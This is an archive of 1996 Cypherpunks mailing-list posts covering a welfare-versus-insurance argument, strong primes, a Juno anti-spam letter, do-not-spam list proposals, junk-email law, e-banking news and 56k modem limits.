Message-ID: <Pine.SUN.3.94.960916192115.6924B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 16 Sep 1996 jbugden@smtplink.alis.ca wrote:

> tcmay@got.net (Timothy C. May) wrote:
> >"Saving for a rainy day," whether saving, investing, getting an education
> (while others are out partying), preparing, etc., all takes effort and
> commitment. If those who save and prepare are then told they have to pay
> high taxes to support those who partied....well, the predictable effect 
> [...] is _more_ people in agony. When you tell people that a compassionate
> society will meet their basic needs, a predictable fraction of them will choose
> not to work hard and prepare themselves.
> 
> Two questions, two observations:
> Do you have health insurance?
> Do you have life insurance?

Yes, so?
Yes, so?

> I have commented on your line of reasoning before and and it still
> seems to me that an important part of the discussion is missed.
> Specifically, that anyone can "save for a rainy day" and still not be
> able to provide for events that can always happen: Heart attack, stroke,
> car accident, pinched nerve that leaves you in excruciating pain and
> unable to work for several years.

Understand what it is you are saying.

You are saying that everyone on the planet has a right to health insurance
and disability insurance whether they can afford it or not.  This is
folly.  The result is serious moral hazard problems.  See below.

> I don't think that a reasonable person would argue that medical
> insurance should be outlawed because everyone should take care of their
> own needs.

Perhaps not.  A reasonable person will argue, however, that your rates
should be reduced and you should be placed in a lower risk group based on
criteria like employment, health history, marital status, number of
dependents and so forth.

(Charging the same premium for the 49 year old married non-smoking
female accountant with two kids and the inner city 18 year old corner
crack dealer is folly).

This is called "Risk pool seperation."

And while I may not argue for the prohibition of health insurance, I will
argue for compulsary payments for insurance policies - and against
socially funded insurance (Look up the term "moral hazard" - I'm not going
to provide you with an insurance vocab course).

Remember the original purpose of social security.  A government fund which
was self sustaining because it only gave out what was put in and gained by
investment.

> A social safety net is simply a form of health and life
> insurance. Statistical arbitrage if you will.

Yes, but not for the reasons you would cite.  Social safety nets prevent
rioting by the lower classes, revolution and general civil disorder
because they appease the masses.  Indeed this is a form of health and life
insureance for the middle and upper classes.

> By spreading the risk you
> minimize the cost. Yes, some people will take advantage of the system.
> But like a virus, a robust system should be able to withstand this form
> of attack.

This is absolutely silly.  Speading the risk alone does nothing.  The cost
for those who can pay is increased, and the cost for those who cannot pay
is made 0 (it already was 0 incidently).

It is also the reason the taxpayers (and not the savings and loan
community at large) were forced to bail out the failed financial
institutions.  Namely, because premiums were not tied to risk.  The FDIC,
as of last year in any event, charges a flat rate fee for all financial
institutions.  This is independent of any risk analysis of their
investments.  i.e., a financial institution that invests in trailor parks
in Arkansas pays the same premiums for federal deposit insurance as a
institution that invests in government issued debt instruments.  (There is
some ceiling for risk, but not a graduated system below the ceiling).

The result was (is) an incentive to risky investments.  If you are a
financial institution and I tell you "I will charge you $1.00 to insure
$1000.00 of low risk and low profit investments, but I will charge you a
while $1.00 to insure $1000.00 of extremely risky but highly
profitable option and currency investments" which one are you going to
choose?  (Hint, you're an idiot if you pick option #1).

The reason the insurance fund was depleted is because there was no risk
balancing built into the system.  The premiums did not cover the losses.
They would have if they were risk adjusted.

Spreading the risk, by itself, does NOT reduce cost.  You must properly
PRICE risk.

This is the distinction between insurance and welfare.  I suggest that you
read up on this topic carefully before you try to argue this subject.  It
makes you look rather clueless.

Welfare merely hands out money for those who have not bothered or cannot
afford insurance.  The result is an INCREASE in cost (taxes) to those who
are coughing up the cash so that they may support.

(I might add that no one in the United States today is denied catastrophic
health care.  Emergency Rooms are not allowed by law to discharge an
unstable patient.  You could be a bum on the street and be treated very
well by any global standards for a heart attack, stroke, car accident,
etc.  To argue, as you effectively do, that such people are somehow
entitled to millions of dollars in medical care so that they may, e.g.,
get a heart transplant, is an untenable position).

[Bloom County Nonsense removed]

> Prend soin,
> James
> 
> [Bible excerpt awaiting review as a motivation for human decency.]
> The ground of a certain rich man brought forth plentifully: And he thought
> within himself, saying, What shall I do, because I have no room where to bestow
> my fruits? And he said, This will I do: I will pull down my barns, and build
> greater; and there will I bestow all my fruits and my goods. And I will say to
> my soul, Soul, thou hast much goods laid up for many years; take thine ease,
> eat, drink, and be merry. But God said unto him, Thou fool, this night
> thy soul shall be required of thee: then whose shall those things be,
> which thou hast provided? 

Read: What you don't spend, you must give away.  (This of course ignores
the benefits to society of investing in e.g., the stockmarket, or
government debt, it also ignores the fact that anyone who manages to save
and invest a pile of money after paying the effective 50% tax rate in the
United States has already given up half or more of the value of his
labor).

> [excerpted from Luke 12:16-20, King James Version]

"When you have nothing to say, consult the bible."

- C.S. Lewis

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Tue, 17 Sep 1996 13:28:58 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Risk v. Charity (was: RE: Workers Paradise. /Political rant).
Message-ID: <v02130504ae6362385951@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>On Mon, 16 Sep 1996 19:58:25 -0400, Black Unicorn <unicorn@schloss.li> wrote:
>
>Remember the original purpose of social security.  A government fund which
>was self sustaining because it only gave out what was put in and gained by
>investment.

Not quite.  You'll remember that SS was pitched to the masses as such
during the Great Depression, but its true purpose was to allow older
workers to quickly retire and make room for the largely unemployed men in
their prime, family raising, years.

>
>> A social safety net is simply a form of health and life
>> insurance. Statistical arbitrage if you will.
>
>Yes, but not for the reasons you would cite.  Social safety nets prevent
>rioting by the lower classes, revolution and general civil disorder
>because they appease the masses.  Indeed this is a form of health and life
>insureance for the middle and upper classes.

No doubt.  See my previous comment.

>
>> By spreading the risk you
>> minimize the cost. Yes, some people will take advantage of the system.
>> But like a virus, a robust system should be able to withstand this form
>> of attack.
>
>This is absolutely silly.  Speading the risk alone does nothing.  The cost
>for those who can pay is increased, and the cost for those who cannot pay
>is made 0 (it already was 0 incidently).
>
>It is also the reason the taxpayers (and not the savings and loan
>community at large) were forced to bail out the failed financial
>institutions.  Namely, because premiums were not tied to risk.  The FDIC,
>as of last year in any event, charges a flat rate fee for all financial
>institutions.  This is independent of any risk analysis of their
>investments.  i.e., a financial institution that invests in trailor parks
>in Arkansas pays the same premiums for federal deposit insurance as a
>institution that invests in government issued debt instruments.  (There is
>some ceiling for risk, but not a graduated system below the ceiling).
>
>The result was (is) an incentive to risky investments.  If you are a
>financial institution and I tell you "I will charge you $1.00 to insure
>$1000.00 of low risk and low profit investments, but I will charge you a
>while $1.00 to insure $1000.00 of extremely risky but highly
>profitable option and currency investments" which one are you going to
>choose?  (Hint, you're an idiot if you pick option #1).
>
>The reason the insurance fund was depleted is because there was no risk
>balancing built into the system.  The premiums did not cover the losses.
>They would have if they were risk adjusted.
>

Next major recession: Here we go again.

>Spreading the risk, by itself, does NOT reduce cost.  You must properly
>PRICE risk.
>
>This is the distinction between insurance and welfare.

Right on!

>Welfare merely hands out money for those who have not bothered or cannot
>afford insurance.  The result is an INCREASE in cost (taxes) to those who
>are coughing up the cash so that they may support.
>



PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Snoop Daty Data           | Internet: azur@netcom.com
Grinder                   | Voice: 1-702-655-2877
Sacred Cow Meat Co.       | Fax: 1-702-658-2673
7075 W. Gowan Road, #2148 |
Las Vegas, NV 89129       |
---------------------------------------------------------------------

Just say NO to perscription DRUGS.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 17 Sep 1996 13:44:18 +0800
To: cypherpunks@toad.com
Subject: Re: forward secrecy in mixmaster
Message-ID: <199609170326.UAA18494@dfw-ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:29 PM 9/12/96 +0000, paul@fatmans.demon.co.uk wrote:
>Stewart>  I think they chose a strong prime (form p = 2q+1, q prime),
...
>Strong primes are no longer of any benefit for cryptographic 
>applications.

You're probably right, for today's factoring techniques.
For a key you're only planning to use for the next couple of years,
you can pretty much ignore strong primes, unless you're stuck with
512-bit keys, in which case you need to glean any crumbs you can.
But for a value that needs to last a long time, such as a 
Diffie-Hellman modulus that's going to be a default value in a standard,
and which you're only going to generate once anyway, it makes sense
to generate a strong prime in case factoring methods that are
affected by it become popular again in the future.  It also makes sense
to turn loose a bunch of people using different primality tests
just in case somebody gets lucky (e.g. crank the test long enough that
the probability of non-primality is 10**-9 or 10**-12 instead of just 10**-6.

>Implementing strong primes won`t make your code any less secure, it 
>will just take longer to create the keys and won`t gain you any 
>security, all the big boys are using elliptic curve factoring methods 
>now so you really have nothing to gain.

Do Generalized Number Field Sieve and its friends count as
elliptic curve methods?

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Tue, 17 Sep 1996 14:54:45 +0800
To: cypherpunks@toad.com
Subject: Forwared message from Pres. of juno.com
Message-ID: <Pine.BSF.3.91.960916204901.14231B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



Just thought I'd pass this along. I had jumped all over Juno on the list 
after the "talker" started, and tarred all of juno with the same brush. I 
was rather harsh on a company that I really don't know all that much 
about, except by judging a small sample of its clients.

Sorry, Charles, and good luck with the grand social experiment.

- r.w.


---------- Forwarded message ----------
Date: Fri, 13 Sep 1996 15:25:58 -0400
From: Charles Ardai <charles@staff.juno.com>
To: Rabid Wombat <wombat@mcfeely.bsfs.org>
Subject: Annoying spam incident(s)

Hi.

Your posting to cypherpunks was brought to my attention, and I wanted to
take a minute to respond.  (I also forwarded a copy of it to
"postmaster@juno.com", where we have a (small) staff of people to deal with
incidents like the one you ran into.  If you run into more in the future,
please e-mail the information to that address.) Since this is not directly
relevant to cypherpunks, I'm replying directly to you, but you are welcome
to forward this note to the list if you want.

> Complaints about spamming and cross-posting probably won't get you far,
> either. On-Net spamvertizing seems to be their source of revenue. Perhaps
> shaw.net needs to be contacted instead.

A couple of clarifications: Juno has never sent a single piece of spam and,
as long as I have anything to say about it, never will.  We provide a free
e-mail service which is paid for by advertising, but the advertising takes
the form of graphical banners built into Juno's custom interface and the
ads only appear on the screens of Juno's members.  We have never sent any
ads by e-mail, and have never sent any online ads of any sort to anyone who
was not one of our members.

What's more, we expressly prohibit the use of Juno to transmit commercial
solicitations in the Service Agreement that all members have to accept before
they can create a Juno account.  When we hear about violations, we
investigate and (if it seems appropriate) take actions up to and including
terminating a violator's account on our service.  Needless to say, we do
not read or in any way screen the mail our members send or receive, so
until we hear about a spamming incident we have no way to prevent a
particular piece of spam from being transmitted; but I promise you we do
listen to the complaints we receive and act on them as quickly as we
responsibly can.  In short, we do not send spam, we do not tolerate spam,
and we will not allow our service to become a home to spammers.

Note that today we supply e-mail to more than 400,000 members, and over
6000 people create Juno accounts every day.  At this rate of growth, we can
expect to have millions of members by this time next year.  The vast
majority of our members use our service responsibly; it's only a fraction
of a fraction of one percent who send spam.  I appreciate your frustration
at dealing with these abusers of our service -- and believe me, they don't
frustrate you half as much as they do us -- but I ask that you not penalize
the hundreds of thousands of responsible Juno members (and those users of
your network who want to communicate with them) because of the actions of
the handful of miscreants doing their best to give us a bad name.  Juno has
no more (and, alas, no less) spam-producing potential or control over the
spam its members send than Netcom, AOL, CompuServe, or any other e-mail
provider.  (We're slightly better, perhaps, because Juno currently offers
its members no tools for direct posting to newsgroups or information about
mail->news gateways, and slightly worse because it is possible to get a
Juno account without having to give us a credit card number.)

By shutting off access to your network by our members' mail you hurt the
spammers only minimally -- they'll find another address elsewhere and spam
again, I'm afraid -- but may hurt Juno quite a lot.  And since we're the
only major provider of free e-mail in the country today, I'd hate to see
the service needlessly or inappropriately hurt.  (I also have personal
reasons, of course, for not wanting to see Juno hurt.)

I apologize for the length of this message, and if we have been
unresponsive to your past complaints I apologize for that as well.
If you have any questions, please don't hesitate to contact me directly.

Best regards,

Charles Ardai
President
Juno Online Services, L.P.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 17 Sep 1996 13:00:19 +0800
To: cypherpunks@toad.com
Subject: Re: 56 kbps modems (fwd)
Message-ID: <199609170212.VAA07494@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 16 Sep 1996 17:56:43 -0700 (PDT)
> From: Lucky Green <shamrock@netcom.com>
> Subject: Re: 56 kbps modems
> 
> On Mon, 16 Sep 1996, Jay Gairson wrote:
> 
> > Speaking of ISDN, how many people, can afford to have a personal ISDN 
> > line in there house?  And then afford to connect to something/someone 
> > else on a next to permanent basis monthly?
> 
> No problem here. My ISDN bill is a small fraction of my regular phone bill.
> 

Count me in. I am wired 24 hrs a day via ISDN.

                                                   Jim Choate
                                                   CyberTects
                                                   ravage@ssz.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 17 Sep 1996 14:31:14 +0800
To: cypherpunks@toad.com
Subject: Re: Spam blacklist project
In-Reply-To: <9609162025.AA00550@etna.ai.mit.edu>
Message-ID: <7aLDuD77w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


hallam@ai.mit.edu writes:
> 	The following idea just hit me. How about a server which
> maintained a list of people who don't want to recive SPAM? The idea
> being that email recpients who don't want SPAM send their email
> address to the list. A SPAMer who want to check an email to see
> if it is on the list could then obtain the SHA-Digested list of
> addresses and remove them from their internal databases.
>
> 	Of course I don't for a moment imagine that this will
> be 100% effective. Without government regulation there will
> always be slimeballs who send mail to people who don't want it.
>
> 	The advantage of this scheme is that it would mean that
> the spam industry can avoid regulation pressure and they can
> deflect criticism. Meanwhile recipients of unwanted spam have
> a legitimate beef.

I proposed this very idea on Usenet a few weeks ago. Apparently the
folks who send out spam e-mail (DEMMA) like it very much. (They're not
masochists -- they don't want to mail people who'll mailbomb them right
back or complain to their postmasters or otherwise make their lives
miserable :-) Such a list should be maintained by a neutral third party,
not by one of the junk-mailers for two reasons: they can't really be
trusted, and their plugs get pulled all the time.

Note that I also proposed making freely available lists of people who
said they _do want to receive junk mail on various topics - to make
*selling* such lists meaningless.

I'll repost some excerpts from the Usenet thread to give you some idea
of what's been discussed already, and what kind of discussion it was.

1.
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Message-ID: <PggZqD92w165w@bwalk.dm.com>

A user asks a 'bot for a random cookie. The user e-mails the 'bot
the cookie (for authentication) and his preference for unsolicited commercial
junk e-mail: wants it, doesn't want it, or doesn't care

The 'bot maintains an FTP site with 2 compressed lists of e-mail addresses:
people who said they want junk e-mail and people who said they don't want
it. (No list for "don't care's" is needed.)

An advertiser preparing a mass e-mail campaign should take care not to
e-mail the addresses that don't want junk e-mail. (A mailing list scrubbing
tool should be provided.) Bothering people on this list would be a serious
net-abuse

On the other hand, sending unsolicited commercial e-mail to people who told
the 'bot they want it, or who haven't bothered to tell the 'bot
they don't want junk mail, is not net-abuse. Like it or not, if you post to
Usenet, you can expect junk e-mail coming your way. It's your responsibilty
to make it known that you don't want unsolicited commercial e-mail

2.
From: clewis@ferret.ocunix.on.ca (Chris Lewis)
Message-ID: <DuHrG8.6Fp@ferret.ocunix.on.ca>

>I remind everyone of Dr. Grubor's brilliant proposal. (I will type slowly,
>so that even the Cabal can understand.)

Grubby's "brilliant proposal" isn't really Grubby's.  It's been made by
several spammers over the months.  Eg: Slaton.  Tyrell's InsideConnections.
The "Direct Email Marketing Association".

3.
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Message-ID: <Jg02qD534w165w@bwalk.dm.com>
References: <PmZiqD58w165w@bwalk.dm.com> <PggZqD92w165w@bwalk.dm.com> <DuHrG8.6Fp@ferret.ocunix.on.ca> <gkB2qD124w165w@bwalk.dm.com> <DuJ15n.9n4@ferret.ocunix.on.ca>

>>but if they agree to abide by his list and not to e-mail
>>the people who indicated their desire not to be e-mail, it's just wonderful!
>
>They won't.

>From what I know of Slaton, I don't expect him and his associates to send
unsolicited commercial e-mail to addresses that indicate to him that such
e-mail is unwelcome

>>I get junk mail; I also see bounced junk mail addressed to nonexistent accounts
>>like "antivulis@bwalk.dm.com" (used for forgeries by your pal Pidor Vorobiev).
>>Sometimes the junk mail tells the recepient to e-mail some address to be
>>removed from a mailing list. I tried it a few times, but the address would
>>always be defunct by then.
>
>Exactly.

You sound proud of the fact that there's no mechanism for me to let Slaton
know that I don't want to receive unsolicited commercial e-mail?

>>It's particularly
>>inexcusable if you're telling the truth and Slaton&co have indeed agreed to
>>abide by the "don't-mail" requests.
>
>I didn't say that they _do_ abide by them.

Of course they can't now

There is no FTP site where a spammer can get (for free) the
list of addresses to which junk e-mail shouldn't be sent. Nor is there a
user-friendly way to add one's address to this "don't e-mail" list - yet

>Even when they've invented the "don't-mail" process themselves, they
>don't abide by them.  Slaton just used it as a means to extort money -
>he never intended to actually respect it.

Slaton&co shouldn't be the one maintaining the list of addresses that don't
want junk e-mail. A deamon should do it, and the service should be free.

By the way I don't recall Slaton asking anyone to pay for not being e-mailed.
Unless you provide a quote, I'll assume you made this up.

>>>And you know what?  Not a single spammer uses any one of them.  Including
>>>Slaton or Tyrell.  They just sell the lists to other spammers.
>
>>Please explain how the spammers would _sell each other the list of
>>addresses of people who DON'T want junk e-mail if it were _freely available
>>for FTP.  I think you overestimate their talent for salesmanship. :-)
>
>It's called "fraud".  They'd do it exactly the same way that Slaton sells
>his "products" and "services" which are known to (a) not work, and (b)
>aren't supported as promised.

You haven't answered my question, Lues. If the list of e-mail addresses of
people who DON'T want junk e-mail is made available for _free for FTP,
together with a tool for spammers to scrub their mailing lists of these
addresses, and an easy way for anyone to add his or her address to this
list for _free, then how would Slaton _sell this list to anyone?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 17 Sep 1996 14:53:21 +0800
To: cypherpunks@toad.com
Subject: Something crypto-financially relevant for a change
Message-ID: <RoLDuD78w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


C-punks,

I have somr wire clippings that I think are more relevant to this list's
stated topic that the constant personal attacks, rants, and newbie questions.
I don't have the resources to send them out on request like JYA does. Would
anyone be interested in my sending more materials like this to this list?

BANKS BANK ON INTERNET

Internet banking is poised for a rapid growth in Europe according to a
survey of the European banking industry by Booz Allen & Hamilton. Thirty
seven banks took part in the survey, which found that 80% were planning
to upgrade existing Web sites to incorporate most traditional banking
transactions within three years. There was also signs of the emergence
of the first Internet-only banks. Wide-spread concerns about security
are more an issue of perception than of real obstacles, according to
Claus Nehmzow, a principal of BAH. The survey predicts that over the
next five years 2,000 European banking institutions will be online.

-- New Media Age, 9/12/96

IBM TEAMS WITH 15 BANKS TO FORM INTEGRION FINANCIAL NETWORK

Fifteen of North America's leading banks and IBM today announced the
formation of Integrion Financial Network. Beginning in early 1997,
Integrion will offer a broad range of interactive banking and electronic
commerce services to banks in the U.S. and Canada. Representing over
half the retail banking population in North America, over 60 million
households, Integrion will be owned and operated by IBM and the member
banks (ABN AMRO, BANC ONE, Bank of America, Barnett Bank, Comerica,
First Bank Systems, First Chicago NBD Fleet Financial Group, KeyCorp,
Mellon Bank, Michigan National Bank, NationsBank, PNC Bank, Royal Bank
of Canada and Washington Mutual). This ownership structure enables banks
to play a central role in determining the manner and format in which
these services are offered to their customers, ensuring that electronic
banking services are consistent with the bank's full range of services,
are branded by the bank, and that the bank's customers receive maximum
benefit.

-- Business Wire, 9/9/96

IN CHECK FRAUD WAR, SIMPLE IDEA MAKES ITS MARK

In Texas, Nevada, Arizona and more than a dozen other U.S. states,
bankers are fighting check fraud by equipping tellers with ink pads so
they can affix the thumbprint of customers who are not regular patrons
of the bank to the backs of checks they cash. Banks lose millions each
year to organized crime and gang members who steal checks or duplicate
payroll checks and then cash them. These crimes cost banks $815 million
in 1993 alone, more than 12 times what they lost in robberies, according
to American Bankers Association statistics. Said Dawn Duplantier of the
Texas Bankers Association, which began selling its member banks the pads
last December, "Across the board in the first six months, we have had a
70% decrease" in check fraud," she said. Bank of America, the
third-largest U.S. bank, began taking prints at 43 of its branches in
Nevada in 1994. Since then the bank has seen a 40% to 60% decline in
check fraud, said Robert Randolph, liaison officer for the bank's
investigative services division.

-- Int'l Herald Tribune, 9/7/96

DAIWA SECURITIES SELLS U.S. GOVERNMENT SECURITIES OVER INTERNET

Daiwa Securities America has expanded its trading room into cyberspace
by allowing dealers to negotiate purchases and sales of U.S. government
securities through the Internet, the worldwide computer network. The
move will let clients log on to the bank's network using any Internet
Service Provider and effectively close a deal online. Clients can access
Daiwa's network through the bank's Web site -- located at
http://www.oddlot.com -- and from t here place their buy or sell orders.
To skirt the security holes, Daiwa is using several mechanisms, ranging
from Internet firewalls to Secure ID cards, in an effort to prevent
hackers from placing rogue or phony deals into the system. "Anybody can
hook up to our Web site, but they can only get as far as our firewall.
Then they have to have a Secure ID card and an account open with Daiwa,"
a spokesman said. The "secure IDs" are in fact small electronic cards
that give the user an entrance code, which change s every 60 seconds, to
a computer network. The system is now available only for financial
institutions and brokerage houses interested in dealing with Daiwa. No
individuals are allowed to open personal accounts and trade using the
system at this point.

-- Reuter, 9/6/96

BANKS SHOULD PREPARE TO CASH IN ON E-CASH

According to a new study by Killen & Associates, banks can regain the
leadership position in payments by leveraging their payment transaction
infrastructure to support electronic cash (E-cash) services. "By 2005,
E-cash transactions will escalate to almost 30 billion," stated Michael
Killen, president of the market research firm. "Non-banks see this as a
new opportunity to carve further market share away from the banking
industry. All will compete for new revenue streams including
Internet-based micropaym ents and 'by the byte electronic commerce
purchasing services. E-cash, including secured credit/debit cards,
stored-value cards, smart cards, ATM derivatives, and other forms, is
less expensive for business than handling cash or standard credit cards
and more secure than checks," Killen continued. "Opportunities will open
for financial and other product and services players, including ATM
vendors; ATM/POS terminal manufacturers and network suppliers, including
bank-owned networks, American Express, Deluxe, ACS, and VeriFone; and
cash handling/cash management services firms."

-- Business Wire, 9/4/96

THE CHECK IS NOT IN THE MAIL

The federal government must stop using checks by Jan. 1, 1999. Can the
rest of us be far behind? A quarter-century ago digital visionaries were
predicting the checkless society, and the number of checks written in
the U.S. has tripled since then, to 61 billion in 1995. But one day, the
predictions will come true, and that day moved closer with a
little-noticed provision in April's federal budget compromise. It will
force the biggest check writer of all -- the U.S. government -- to
abandon paper checks almo st entirely by Jan. 1, 1999. After that,
virtually all 1 billion federal payments made each year, including
Social Security, must be made through electronic funds transfers. Yet,
90% of U.S. banks, and some federal agencies, aren't capable of
electronically transmitting and receiving key information that
accompanies vendor payments. The new law will force them all to get
moving.

-- Forbes, 9/9/96

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard Johnson" <rjj@medialab.com>
Date: Tue, 17 Sep 1996 15:46:19 +0800
To: Ian Goldberg <cypherpunks@toad.com
Subject: Re: Unsolicited email advertising already illegal in US?
Message-ID: <v02140b00ae63b67440bc@[204.144.184.50]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 15:54 9/16/96, Ian Goldberg wrote:
>This piece from RISKS looks interesting.  My computer certainly _is_
>
>    "equipment which has the capacity to transcribe text or images
>    (or both) from an electronic signal received over a regular
>    telephone line onto paper."
>
>Now, are HipCrime et al. liable for $500 in damages for each piece of spam?
>If so, where do I sign up?


The intent of that law is to prevent the shifting of advertising costs to the
unwilling recipients of junk faxes.  (The $500 per message damages figure is what
prompted me to raise my proofreading rates to $500 per message.)

Twisting this law to apply it to junk email sent to computers with carefully
selected peripherals and net connections is certainly following that
anti-cost-shifting intent.  Quite amazing, that, to twist a law so cruelly and at
the same time follow its intent.

However, which way a judge would jump on it remains to be seen.  One source
considers its application to junk email to be unlikely, because in essence it's
too much of a twist.

See:
        http://www.ca-probate.com/faxlaw.htm
for another copy of the law, and
        http://techweb.cmp.com/net/issues/036issue/036law.htm
for an opinion that actual application of the law to junk email is unlikely.


Richard

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMj4YF/obez3wRbTBAQEHVQQAgP+35ZmOpsw1A7VsMHAONCFL4c5+xXSI
8NR9bibFZ+X+vNRSgp8KsEH2JyUk3g50ygYWx8DrzC0jhDdu902VTTN9lI92RJf5
66P5mzOCIzbfULra7wy4nSjfGR7vRTNrvY3y5fKodDvPRekkd8TcBSn/aPW/ONRa
Gk/AbxKd6Cc=
=qTcT
-----END PGP SIGNATURE-----


--
"As the most participatory form of mass speech yet developed, the Internet
deserves the highest protection from governmental intrusion. ... Just as the
strength of the Internet is chaos, so the strength of our liberty depends
upon the chaos and cacophony of the unfettered speech the First Amendment
protects."
        -- Judge Stewart Dalzell

Unsolicited advertising/promotional email proofread for $500/message!  Your sending such a message to me is an explicit request for my services!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Tue, 17 Sep 1996 16:28:11 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: 56 kbps modems
Message-ID: <v02130505ae63766115ed@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>>> People who seemed to know used to say that 'the Shannon limit'
>>> set an absolute upper limit around 40 kbps. Has Shannon been
>>> proven wrong, or what?
>>Well, it all depends on the signal-to-noise ratio. Also, if the noise is
>>not white gaussian the situation can be even better.
>
>Or it can be worse.  Almost all voice traffic in the US these days,
>either once it gets to your local telephone wire center or maybe before,
>is carried on T1 digital connections, which use 64kbps digital voice -
>it's sampled at 8000 samples/second, A/D converted using a non-linear
>8-bit scale called mu-law (or A-law for Europe), and (for the most common
>framing format) has a signalling channel stego'd onto the LSB of every 6th
>byte.
>If you knew which the "robbed bit" was, you could get 63 kbps of digital data,
>but since you don't, digital signals are limited to 56kbps since they
>can't trust any of the low bits (analog doesn't lose much from this.)
>

Couldn't you just 'assume' you knew which bit was 'robbed' and test to see
the result?  If you were wrong, couldn't you advance/retard your clocking
and via a process of elimination sync with the 'robbed bit?

--Steve



PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Snoop Daty Data           | Internet: azur@netcom.com
Grinder                   | Voice: 1-702-655-2877
Sacred Cow Meat Co.       | Fax: 1-702-658-2673
7075 W. Gowan Road, #2148 |
Las Vegas, NV 89129       |
---------------------------------------------------------------------

Just say NO to perscription DRUGS.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Tue, 17 Sep 1996 12:54:46 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Government awards GAK contract to Nothern
Message-ID: <199609170159.VAA20797@nrk.com>
MIME-Version: 1.0
Content-Type: text


Clarinet sez:
  	  				 
OTTAWA, Sept. 16 (UPI) -- The federal government has chosen
Northern Telecom's data security software, Entrust { } Public-Key
Infrastructure (PKI)... for gov't use.....

worth $7.3 million......

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close...........(v)301 56 LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead........vr vr vr vr.................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Ray <liberty@gate.net>
Date: Tue, 17 Sep 1996 14:20:45 +0800
To: hallam@ai.mit.edu
Subject: Re: Spam blacklist project
Message-ID: <199609170200.WAA13918@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: hallam@ai.mit.edu, cypherpunks@toad.com
Date: Mon Sep 16 21:57:31 1996
Phill wrote:

[interesting anti-spam idea.]

>       Of course I don't for a moment imagine that this will
> be 100% effective. Without government regulation there will
> always be slimeballs who send mail to people who don't want it.

Your faith in big government, despite seemingly every bit of evidence 
possible to the contrary, astounds me sometimes. Churches, Mosques, etc. 
struggle mightily for this kind of thought pattern in believers, yet it 
comes to you naturally, in secular life. Truly a marvel, and on _this_ list, 
of all places. It has kept me from killfiling you, but I must occasionally 
express my awe at the power of faith to literally move mountains. There is a 
"regulation" (law) against [murder, selling/growing reefer, selling sexual 
services, assault, you name it] yet you'd never deny that these behaviors 
still exist, would you? Somehow, though, you still seem to manage to think 
that spamming slimeballs will just disappear with more regulations. It's 
astonishing.

>       The advantage of this scheme is that it would mean that
> the spam industry can avoid regulation pressure and they can
> deflect criticism.

I thought that "The Hippie of Crime" proved that spammers, if slick enough, 
could deflect criticism from themselves without any government help.

> Meanwhile recipients of unwanted spam have 
> a legitimate beef.

Don't we already have a legitimate beef, though? [I like your idea, BTW.] In 
fact, in view of Ian's recent posting, don't we already have a law, too?
JMR -- "I think I'll reattach my printer to this machine."


Regards, Jim Ray -- DNRC Minister of Encryption Advocacy

"As govt.s grow arithmetically, corruption grows exponentially."
 -- Ray's Law of official corruption.

 Defeat the Duopoly!             Stop the Browne out.
 Harry Browne for President. Jo Jorgensen for Vice-president.
 http://www.HarryBrowne96.org/   http://www.twr.com/stbo
___________________________________________________________________
PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8
I will generate a new (and bigger) PGP key-pair on election night.
<mailto:liberty@gate.net> http://www.shopmiami.com/prs/jimray
___________________________________________________________________

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

